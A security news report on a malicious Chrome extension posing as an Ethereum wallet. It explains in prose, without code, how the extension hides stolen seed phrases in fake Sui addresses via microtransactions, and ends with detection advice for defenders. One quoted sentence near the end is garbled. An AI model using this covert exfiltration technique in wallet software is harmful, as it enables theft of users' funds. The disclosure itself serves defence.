Cybersecurity researchers have discovered a malicious Chrome extension that poses as a legitimate Ethereum wallet but hosts functionality to exfiltrate users’ seed phrases.
The name of the extension is “Safery: Ethereum Wallet,” with the threat actor describing it as a “secure wallet for managing Ethereum cryptocurrency with flexible settings.” It was uploaded to the Chrome Web Store on September 29, 2025 and updated on November 12. It is still available for download at the time of writing.
“Marketed as a simple and secure Ethereum (ETH) wallet, it contains a backdoor that exfiltrates seed phrases by encoding them in Sui addresses and broadcasting microtransactions from a Sui wallet controlled by a threat actor,” said Kirill Boychenko, security researcher at Socket.
Specifically, the malware in the browser add-on is designed to steal wallet mnemonic phrases by encoding them as fake Sui wallet addresses, and then using microtransactions to send 0.000001 SUI to those wallets from a hard-coded wallet controlled by a threat actor.
The malware’s end goal is to smuggle the seed phrase into normal-looking blockchain transactions without needing to set up a command and control (C2) server to receive the information. Once the transactions are completed, the malicious actor can decode the recipient addresses to reconstruct the original seed phrase and ultimately drain the assets.
“This extension steals wallet seed phrases by encoding them as fake Sui addresses and sending them microtransactions from an attacker-controlled wallet, allowing the attacker to monitor the blockchain, decode the addresses into seed phrases, and drain victims’ funds,” Koi Security notes in an analysis.
To counter the risk posed by the threat, users are advised to stick to reliable wallet extensions. It is recommended that defenders scan extensions for mnemonic encoders, synthetic address generators, and hardcoded seed phrases, as well as block those that write to the chain when importing or creating a wallet.
“This technique allows threat actors to change RPC strings and endpoints with little effort, so detections that rely on specific domains, URLs or extension IDs will not do so,” Boychenko said. “Treat unexpected blockchain RPC calls from the browser as a high signal, especially when the product claims to be a unique chain.”
